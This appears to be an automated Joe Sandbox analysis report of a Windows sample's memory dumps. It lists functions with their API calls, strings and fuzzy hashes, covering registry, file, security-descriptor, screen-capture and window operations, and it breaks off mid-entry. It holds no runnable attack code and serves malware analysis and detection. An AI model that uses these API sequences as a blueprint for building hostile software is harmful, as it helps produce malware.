                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: 34d15c1c189310c42b47b1bf595c1cc5bd5e406875d9a1855557507778af550f
                                          • Instruction ID: f905076323eb6ac7f41cacc17ed4d07033e0e46465a1dc2f2c42d0d12cd7ad06
                                          • Opcode Fuzzy Hash: 34d15c1c189310c42b47b1bf595c1cc5bd5e406875d9a1855557507778af550f
                                          • Instruction Fuzzy Hash: 395169711083049FC304EF10C981DAAB7F4FF99358F50492DF896972A2DB31AE49CB52
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0011A852
                                          • __swprintf.LIBCMT ref: 0011A874
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0011A8B1
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0011A8D6
                                          • _memset.LIBCMT ref: 0011A8F5
                                          • _wcsncpy.LIBCMT ref: 0011A931
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0011A966
                                          • CloseHandle.KERNEL32(00000000), ref: 0011A971
                                          • RemoveDirectoryW.KERNEL32(?), ref: 0011A97A
                                          • CloseHandle.KERNEL32(00000000), ref: 0011A984
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: 0a9457742002b88543ea7cd5e951ef5d57da2f472ed6cea8c81701b02e38f9f4
                                          • Instruction ID: a0dec8bbbd770eaf1d1f6d36f7b059e26c80e9b2f7225803c9ddd188f33ca56a
                                          • Opcode Fuzzy Hash: 0a9457742002b88543ea7cd5e951ef5d57da2f472ed6cea8c81701b02e38f9f4
                                          • Instruction Fuzzy Hash: FA31A375900219ABDB219FA1DC49FEB77BCEF89700F5041B6F609D21A1E77096C48B25
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0013982C,?,?), ref: 0013C0C8
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C0DF
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C0EA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C0F7
                                          • GlobalLock.KERNEL32(00000000), ref: 0013C100
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C10F
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0013C118
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C11F
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0013982C,?,?,00000000,?), ref: 0013C130
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00143C7C,?), ref: 0013C149
                                          • GlobalFree.KERNEL32(00000000), ref: 0013C159
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0013C17D
                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0013C1A8
                                          • DeleteObject.GDI32(00000000), ref: 0013C1D0
                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0013C1E6
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3840717409-0
                                          • Opcode ID: 857b4a86ddfbc29d52a41677affc0f8a11da33c9e26fbbbc90eb5157920523a3
                                          • Instruction ID: dfd7cd167d9131092d21947eb118ad0cf794975355ffcafeb04f07695f3f9afa
                                          • Opcode Fuzzy Hash: 857b4a86ddfbc29d52a41677affc0f8a11da33c9e26fbbbc90eb5157920523a3
                                          • Instruction Fuzzy Hash: DB413D79500205EFDB229F65DC4CEAE7BB8EF8A721F104058FA05E7660D7719D81DBA0
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0013C8A4
                                          • GetFocus.USER32 ref: 0013C8B4
                                          • GetDlgCtrlID.USER32(00000000), ref: 0013C8BF
                                          • _memset.LIBCMT ref: 0013C9EA
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0013CA15
                                          • GetMenuItemCount.USER32(?), ref: 0013CA35
                                          • GetMenuItemID.USER32(?,00000000), ref: 0013CA48
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0013CA7C
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0013CAC4
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0013CAFC
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0013CB31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 1296962147-4108050209
                                          • Opcode ID: f4bc3e1d911b58281d9e82dc9a938bdf1398ec20d1b06878844c7a42e5c74f16
                                          • Instruction ID: 9bfde6f6b23fed54e9d81d5bfe7ccc8900bdf62953fc1362352fc721b3fcaf75
                                          • Opcode Fuzzy Hash: f4bc3e1d911b58281d9e82dc9a938bdf1398ec20d1b06878844c7a42e5c74f16
                                          • Instruction Fuzzy Hash: BC817B75208305AFD715CF14C985EABBBE8FF88354F00492DFA99A72A1D730D945CBA2
                                          APIs
                                            • Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00108E3C
                                            • Part of subcall function 00108E20: GetLastError.KERNEL32(?,00108900,?,?,?), ref: 00108E46
                                            • Part of subcall function 00108E20: GetProcessHeap.KERNEL32(00000008,?,?,00108900,?,?,?), ref: 00108E55
                                            • Part of subcall function 00108E20: HeapAlloc.KERNEL32(00000000,?,00108900,?,?,?), ref: 00108E5C
                                            • Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00108E73
                                            • Part of subcall function 00108EBD: GetProcessHeap.KERNEL32(00000008,00108916,00000000,00000000,?,00108916,?), ref: 00108EC9
                                            • Part of subcall function 00108EBD: HeapAlloc.KERNEL32(00000000,?,00108916,?), ref: 00108ED0
                                            • Part of subcall function 00108EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00108916,?), ref: 00108EE1
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00108B2E
                                          • _memset.LIBCMT ref: 00108B43
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00108B62
                                          • GetLengthSid.ADVAPI32(?), ref: 00108B73
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00108BB0
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00108BCC
                                          • GetLengthSid.ADVAPI32(?), ref: 00108BE9
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00108BF8
                                          • HeapAlloc.KERNEL32(00000000), ref: 00108BFF
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00108C20
                                          • CopySid.ADVAPI32(00000000), ref: 00108C27
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00108C58
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00108C7E
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00108C92
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 935f683c06a0a17896dd3973591271c91b5cd59108c1157d2d291a7584c11a42
                                          • Instruction ID: fbb3d0118b015825da81d5abb87f128457632d79e4caf4054ac878e4f5804654
                                          • Opcode Fuzzy Hash: 935f683c06a0a17896dd3973591271c91b5cd59108c1157d2d291a7584c11a42
                                          • Instruction Fuzzy Hash: 58615A75904209AFDF11DF91DD44EEEBB79FF19300F048169FA95A72A0DBB19A00CB60
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00127A79
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00127A85
                                          • CreateCompatibleDC.GDI32(?), ref: 00127A91
                                          • SelectObject.GDI32(00000000,?), ref: 00127A9E
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00127AF2
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00127B2E
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00127B52
                                          • SelectObject.GDI32(00000006,?), ref: 00127B5A
                                          • DeleteObject.GDI32(?), ref: 00127B63
                                          • DeleteDC.GDI32(00000006), ref: 00127B6A
                                          • ReleaseDC.USER32(00000000,?), ref: 00127B75
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 6d46b6526c395eb6c85cc01d66d9ddbd3ed01e46d1ce4f599b426782d873f472
                                          • Instruction ID: 13e611234c48bf7b59ea2d2ce04b5100d00a6894c709ffb3904aeaf5cb486140
                                          • Opcode Fuzzy Hash: 6d46b6526c395eb6c85cc01d66d9ddbd3ed01e46d1ce4f599b426782d873f472
                                          • Instruction Fuzzy Hash: 5A516B75904319EFCB15CFA9DC84EAFBBB9EF49310F14841DFA4AA7260D731A9508B60
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0011A4D4
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0011A4F6
                                          • __swprintf.LIBCMT ref: 0011A54F
                                          • __swprintf.LIBCMT ref: 0011A568
                                          • _wprintf.LIBCMT ref: 0011A61E
                                          • _wprintf.LIBCMT ref: 0011A63C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 311963372-2391861430
                                          • Opcode ID: 468840b1f678723c3a976508f74ed5f3cd336b47848d8a8a4e0dfde8b64b6515
                                          • Instruction ID: b74336f0abf9eac0dbbde1597d3d8d43594c1719cb09bfd336098fe0ccbc1b4d
                                          • Opcode Fuzzy Hash: 468840b1f678723c3a976508f74ed5f3cd336b47848d8a8a4e0dfde8b64b6515
                                          • Instruction Fuzzy Hash: 8D519F71801109AACF19EBE0CD86EEEB779AF19340F500169F505B21A3EB316F99CB61
                                          APIs
                                            • Part of subcall function 0011951A: __time64.LIBCMT ref: 00119524
                                            • Part of subcall function 000C4A8C: _fseek.LIBCMT ref: 000C4AA4
                                          • __wsplitpath.LIBCMT ref: 001197EF
                                            • Part of subcall function 000D431E: __wsplitpath_helper.LIBCMT ref: 000D435E
                                          • _wcscpy.LIBCMT ref: 00119802
                                          • _wcscat.LIBCMT ref: 00119815
                                          • __wsplitpath.LIBCMT ref: 0011983A
                                          • _wcscat.LIBCMT ref: 00119850
                                          • _wcscat.LIBCMT ref: 00119863
                                            • Part of subcall function 00119560: _memmove.LIBCMT ref: 00119599
                                            • Part of subcall function 00119560: _memmove.LIBCMT ref: 001195A8
                                          • _wcscmp.LIBCMT ref: 001197AA
                                            • Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DE1
                                            • Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DF4
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00119A0D
                                          • _wcsncpy.LIBCMT ref: 00119A80
                                          • DeleteFileW.KERNEL32(?,?), ref: 00119AB6
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00119ACC
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00119ADD
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00119AEF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: 0ed5b2189b0fda6301d953d79ba066a28d8b667efb496eb856d08ade30c5e789
                                          • Instruction ID: 020244ddfee540bdd3db0f03bffdf0249f16b74cc6111bb928c8b78e5f6f7ed5
                                          • Opcode Fuzzy Hash: 0ed5b2189b0fda6301d953d79ba066a28d8b667efb496eb856d08ade30c5e789
                                          • Instruction Fuzzy Hash: FBC13BB1900228ABDF15DF95CC95EDEB7BDEF59300F0040AAF609E7251EB709A848F65
                                          APIs
                                          • _memset.LIBCMT ref: 000C5BF1
                                          • GetMenuItemCount.USER32(00177890), ref: 00100E7B
                                          • GetMenuItemCount.USER32(00177890), ref: 00100F2B
                                          • GetCursorPos.USER32(?), ref: 00100F6F
                                          • SetForegroundWindow.USER32(00000000), ref: 00100F78
                                          • TrackPopupMenuEx.USER32(00177890,00000000,?,00000000,00000000,00000000), ref: 00100F8B
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00100F97
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 2751501086-0
                                          • Opcode ID: b025efb9a1eebceee1e941cfe917aa67ecff73e8b117073bec0e3f1bdf61d63d
                                          • Instruction ID: 9371ac9c07b6324d102084cd7904f4336f74e85cb1c487cba96866852e39c247
                                          • Opcode Fuzzy Hash: b025efb9a1eebceee1e941cfe917aa67ecff73e8b117073bec0e3f1bdf61d63d
                                          • Instruction Fuzzy Hash: 46711674644709BFEB228B55DC89FEEBF64FF08324F104216F6246A1E1C7B168A0DB90
                                          APIs
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          • _memset.LIBCMT ref: 00108489
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001084BE
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001084DA
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001084F6
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00108520
                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00108548
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00108553
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00108558
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 1411258926-22481851
                                          • Opcode ID: f61412322a802ae72ddcd329d62313f65e379330545ce07bf7ed8563d9101592
                                          • Instruction ID: d53c7d1f9cadd1ef57f13de3382b03dbce0656141c82c827fd566d2edb3f2f70
                                          • Opcode Fuzzy Hash: f61412322a802ae72ddcd329d62313f65e379330545ce07bf7ed8563d9101592
                                          • Instruction Fuzzy Hash: C941F576C1422DABCB11EBA4DC95EEDB778FF09340F044129F945A32A2EB709E14CB90
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: ad2cd366b047ad8fd4972f8ea794b0cc2353740fd1001a48a2696a1695affbb5
                                          • Instruction ID: 9ee2a2b3d23c8618bf3e1a6a2d126007c9df4a18d239e2f34dded2ae25daee3e
                                          • Opcode Fuzzy Hash: ad2cd366b047ad8fd4972f8ea794b0cc2353740fd1001a48a2696a1695affbb5
                                          • Instruction Fuzzy Hash: F941293450035AEBDF04EF90DD51AEA3725AF62304F604416FC9657292DB30ED2ACBA1
                                          APIs
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                            • Part of subcall function 000C153B: _memmove.LIBCMT ref: 000C15C4
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001158EB
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00115901
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00115912
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00115924
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00115935
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: c7baf04bf3bed465fab48d95504c79235e5bb31e7c59694f72d49ec3e5d23c5a
                                          • Instruction ID: 8cb8f392da44d965fff10d969393a3c27832646d29f1976ca0167da3375b3d22
                                          • Opcode Fuzzy Hash: c7baf04bf3bed465fab48d95504c79235e5bb31e7c59694f72d49ec3e5d23c5a
                                          • Instruction Fuzzy Hash: 0A119031A4412DF9D724A7A1CC8AEFF7B7CFBD6B50F800429B811E21D2EB601994C5A1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: 84f22127bf15454c79f1135254104eacfaf8cfb9d3cefe7090f907ca59a8644d
                                          • Instruction ID: 901fa6a0d0f0b77331c902e8dd15980a3211402187b44a780da44333268dba8c
                                          • Opcode Fuzzy Hash: 84f22127bf15454c79f1135254104eacfaf8cfb9d3cefe7090f907ca59a8644d
                                          • Instruction Fuzzy Hash: 37113A31904209ABCB19B7609D4AEDA77BCDF45B10F000176F544962A2EF7099C1CAB0
                                          APIs
                                          • timeGetTime.WINMM ref: 00115535
                                            • Part of subcall function 000D083E: timeGetTime.WINMM(?,00000002,000BC22C), ref: 000D0842
                                          • Sleep.KERNEL32(0000000A), ref: 00115561
                                          • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00115585
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001155A7
                                          • SetActiveWindow.USER32 ref: 001155C6
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001155D4
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 001155F3
                                          • Sleep.KERNEL32(000000FA), ref: 001155FE
                                          • IsWindow.USER32 ref: 0011560A
                                          • EndDialog.USER32(00000000), ref: 0011561B
                                          Strings
                                          Memory Dump Source
